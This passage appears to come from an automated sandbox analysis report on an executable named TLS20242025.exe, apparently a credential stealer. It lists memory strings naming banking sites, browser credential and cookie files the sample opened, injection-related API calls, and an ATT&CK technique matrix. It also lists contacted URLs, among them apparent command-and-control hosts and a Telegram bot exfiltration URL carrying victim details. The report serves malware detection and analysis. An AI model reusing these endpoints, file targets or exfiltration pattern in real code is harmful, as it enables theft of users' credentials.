                    Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
                    Source: TLS20242025.exe, 00000002.00000002.4583576880.0000000000CF7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlls>Q
                    Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                    Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
                    Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                    Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                    Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
                    Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
                    Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
                    Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                    Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
                    Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
                    Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                    Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                    Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                    Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                    Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                    Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                    Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
                    Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                    Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                    Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                    Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
                    Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                    Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                    Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                    Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                    Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeCode function: 2_2_067D9548 LdrInitializeThunk,2_2_067D9548
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: 0.2.TLS20242025.exe.5200000.6.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
                    Source: 0.2.TLS20242025.exe.5200000.6.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
                    Source: 0.2.TLS20242025.exe.5200000.6.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.csReference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num3 + 8, ref buffer, 4, ref bytesRead)
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess created: C:\Users\user\Desktop\TLS20242025.exe "C:\Users\user\Desktop\TLS20242025.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeQueries volume information: C:\Users\user\Desktop\TLS20242025.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeQueries volume information: C:\Users\user\Desktop\TLS20242025.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 00000002.00000002.4585576245.0000000002B11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0.2.TLS20242025.exe.3a92840.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.TLS20242025.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.TLS20242025.exe.3a4fe10.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.TLS20242025.exe.3a92840.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.TLS20242025.exe.3a4fe10.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.TLS20242025.exe.3959d70.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.4583199335.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.4585821019.00000000038E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: TLS20242025.exe PID: 5748, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: TLS20242025.exe PID: 5576, type: MEMORYSTR
                    Source: Yara matchFile source: 0.2.TLS20242025.exe.3a92840.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.TLS20242025.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.TLS20242025.exe.3a4fe10.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.TLS20242025.exe.3a92840.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.TLS20242025.exe.3a4fe10.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.TLS20242025.exe.3959d70.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.4583199335.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.4585821019.00000000038E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: TLS20242025.exe PID: 5748, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: TLS20242025.exe PID: 5576, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\TLS20242025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: Yara matchFile source: 0.2.TLS20242025.exe.3a92840.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.TLS20242025.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.TLS20242025.exe.3a4fe10.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.TLS20242025.exe.3a92840.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.TLS20242025.exe.3a4fe10.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.TLS20242025.exe.3959d70.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.4583199335.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.4585821019.00000000038E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: TLS20242025.exe PID: 5748, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: TLS20242025.exe PID: 5576, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: 00000002.00000002.4585576245.0000000002B11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0.2.TLS20242025.exe.3a92840.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.TLS20242025.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.TLS20242025.exe.3a4fe10.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.TLS20242025.exe.3a92840.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.TLS20242025.exe.3a4fe10.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.TLS20242025.exe.3959d70.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.4583199335.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.4585821019.00000000038E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: TLS20242025.exe PID: 5748, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: TLS20242025.exe PID: 5576, type: MEMORYSTR
                    Source: Yara matchFile source: 0.2.TLS20242025.exe.3a92840.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.TLS20242025.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.TLS20242025.exe.3a4fe10.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.TLS20242025.exe.3a92840.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.TLS20242025.exe.3a4fe10.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.TLS20242025.exe.3959d70.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.4583199335.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.4585821019.00000000038E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: TLS20242025.exe PID: 5748, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: TLS20242025.exe PID: 5576, type: MEMORYSTR
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                    Native API
                    1
                    DLL Side-Loading
                    11
                    Process Injection
                    1
                    Disable or Modify Tools
                    1
                    OS Credential Dumping
                    1
                    Query Registry
                    Remote Services1
                    Email Collection
                    1
                    Web Service
                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                    DLL Side-Loading
                    31
                    Virtualization/Sandbox Evasion
                    LSASS Memory1
                    Security Software Discovery
                    Remote Desktop Protocol11
                    Archive Collected Data
                    11
                    Encrypted Channel
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                    Process Injection
                    Security Account Manager1
                    Process Discovery
                    SMB/Windows Admin Shares1
                    Data from Local System
                    3
                    Ingress Tool Transfer
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                    Deobfuscate/Decode Files or Information
                    NTDS31
                    Virtualization/Sandbox Evasion
                    Distributed Component Object ModelInput Capture3
                    Non-Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script21
                    Obfuscated Files or Information
                    LSA Secrets1
                    Application Window Discovery
                    SSHKeylogging14
                    Application Layer Protocol
                    Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                    Software Packing
                    Cached Domain Credentials1
                    System Network Configuration Discovery
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Timestomp
                    DCSync13
                    System Information Discovery
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    DLL Side-Loading
                    Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    TLS20242025.exe35%ReversingLabsByteCode-MSIL.Trojan.Generic
                    TLS20242025.exe100%Joe Sandbox ML
                    No Antivirus matches
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                    https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                    http://checkip.dyndns.org0%URL Reputationsafe
                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                    https://www.ecosia.org/newtab/0%URL Reputationsafe
                    http://varders.kozow.com:80810%URL Reputationsafe
                    http://aborters.duckdns.org:8081100%URL Reputationmalware
                    https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                    http://checkip.dyndns.org/0%URL Reputationsafe
                    http://anotherarmy.dns.army:8081100%URL Reputationmalware
                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                    http://checkip.dyndns.org/q0%URL Reputationsafe
                    https://reallyfreegeoip.org0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                    http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded0%URL Reputationsafe
                    https://reallyfreegeoip.org/xml/0%URL Reputationsafe
                    https://www.office.com/0%Avira URL Cloudsafe
                    https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:123716%0D%0ADate%20a0%Avira URL Cloudsafe
                    https://api.telegram.org/bot/sendMessage?chat_id=&text=0%Avira URL Cloudsafe
                    https://api.telegram.org/bot0%Avira URL Cloudsafe
                    https://chrome.google.com/webstore?hl=en0%Avira URL Cloudsafe
                    https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
                    https://api.telegram.org0%Avira URL Cloudsafe
                    https://www.office.com/P0%Avira URL Cloudsafe
                    https://www.office.com/lB0%Avira URL Cloudsafe
                    https://reallyfreegeoip.org/xml/8.46.123.330%Avira URL Cloudsafe
                    https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:123716%0D%0ADate%20and%20Time:%2026/09/2024%20/%2020:05:16%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20123716%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D0%Avira URL Cloudsafe
                    https://chrome.google.com/webstore?hl=enP0%Avira URL Cloudsafe
                    https://reallyfreegeoip.org/xml/8.46.123.33$0%Avira URL Cloudsafe
                    https://chrome.google.com/webstore?hl=enlB0%Avira URL Cloudsafe
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    reallyfreegeoip.org
                    188.114.97.3
                    truetrue
                      unknown
                      api.telegram.org
                      149.154.167.220
                      truetrue
                        unknown
                        checkip.dyndns.com
                        193.122.130.0
                        truefalse
                          unknown
                          checkip.dyndns.org
                          unknown
                          unknowntrue
                            unknown
                            NameMaliciousAntivirus DetectionReputation
                            https://reallyfreegeoip.org/xml/8.46.123.33false
                            • Avira URL Cloud: safe
                            unknown
                            https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:123716%0D%0ADate%20and%20Time:%2026/09/2024%20/%2020:05:16%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20123716%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://checkip.dyndns.org/false
                            • URL Reputation: safe
                            unknown
                            NameSourceMaliciousAntivirus DetectionReputation
                            https://www.office.com/TLS20242025.exe, 00000002.00000002.4585576245.0000000002CD8000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4585576245.0000000002CC9000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://duckduckgo.com/chrome_newtabTLS20242025.exe, 00000002.00000002.4588181134.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4588181134.0000000003B31000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://duckduckgo.com/ac/?q=TLS20242025.exe, 00000002.00000002.4588181134.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4588181134.0000000003B31000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://api.telegram.orgTLS20242025.exe, 00000002.00000002.4585576245.0000000002BF6000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:123716%0D%0ADate%20aTLS20242025.exe, 00000002.00000002.4585576245.0000000002BF6000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://www.google.com/images/branding/product/ico/googleg_lodp.icoTLS20242025.exe, 00000002.00000002.4588181134.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4588181134.0000000003B31000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://api.telegram.org/botTLS20242025.exe, 00000000.00000002.4585821019.00000000038E1000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4583199335.0000000000402000.00000040.00000400.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4585576245.0000000002BF6000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://www.office.com/PTLS20242025.exe, 00000002.00000002.4585576245.0000000002CC9000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://www.office.com/lBTLS20242025.exe, 00000002.00000002.4585576245.0000000002CD3000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=TLS20242025.exe, 00000002.00000002.4588181134.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4588181134.0000000003B31000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://checkip.dyndns.orgTLS20242025.exe, 00000002.00000002.4585576245.0000000002B11000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=TLS20242025.exe, 00000002.00000002.4588181134.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4588181134.0000000003B31000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://api.telegram.org/bot/sendMessage?chat_id=&text=TLS20242025.exe, 00000002.00000002.4585576245.0000000002BF6000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://chrome.google.com/webstore?hl=enTLS20242025.exe, 00000002.00000002.4585576245.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4585576245.0000000002CD8000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://www.ecosia.org/newtab/TLS20242025.exe, 00000002.00000002.4588181134.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4588181134.0000000003B31000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://varders.kozow.com:8081TLS20242025.exe, 00000000.00000002.4585821019.00000000038E1000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4583199335.0000000000402000.00000040.00000400.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4585576245.0000000002B11000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://aborters.duckdns.org:8081TLS20242025.exe, 00000000.00000002.4585821019.00000000038E1000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4583199335.0000000000402000.00000040.00000400.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4585576245.0000000002B11000.00000004.00000800.00020000.00000000.sdmptrue
                            • URL Reputation: malware
                            unknown
                            https://ac.ecosia.org/autocomplete?q=TLS20242025.exe, 00000002.00000002.4588181134.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4588181134.0000000003B31000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://reallyfreegeoip.org/xml/8.46.123.33$TLS20242025.exe, 00000002.00000002.4585576245.0000000002BF6000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4585576245.0000000002BD0000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4585576245.0000000002B8A000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://anotherarmy.dns.army:8081TLS20242025.exe, 00000000.00000002.4585821019.00000000038E1000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4583199335.0000000000402000.00000040.00000400.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4585576245.0000000002B11000.00000004.00000800.00020000.00000000.sdmptrue
                            • URL Reputation: malware
                            unknown
                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchTLS20242025.exe, 00000002.00000002.4588181134.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4588181134.0000000003B31000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://checkip.dyndns.org/qTLS20242025.exe, 00000000.00000002.4585821019.00000000038E1000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4583199335.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
